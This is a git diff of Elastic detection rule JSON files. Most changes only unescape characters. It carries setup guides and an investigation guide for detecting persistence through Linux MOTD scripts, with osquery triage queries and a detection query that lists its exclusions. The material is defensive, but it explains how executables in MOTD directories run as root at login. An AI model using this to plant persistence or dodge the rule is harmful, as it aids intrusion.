If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json index 5fcf5beb629..98c44d49b65 100644 --- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json
index d2fbfe43420..7e864e2c5da 100644
--- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_103.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json
index b68a64e70b3..8547fa6339e 100644
--- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_104.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json
index accfb095ab4..ca5cac6ea2d 100644
--- a/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/96b9f4ea-0e8c-435b-8d53-2096e75fcac5_205.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json
index 6e4caf14d84..06535e7dd4f 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json
index cfaeee7c620..e88ed996f59 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_2.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json
index fdaebd62c92..3a2cfa2206f 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_3.json
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\") and not file.extension : \"swp\"\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json index 29db3d7b517..5c6d9b27769 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_4.json 
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/kaniko/executor\") and not \nfile.extension : (\"swp\" or \"swx\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json
index ef6e5ab68e2..81bbf497861 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_5.json
@@ -17,7 +17,7 @@
 "file.path",
 "process.name"
 ],
- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
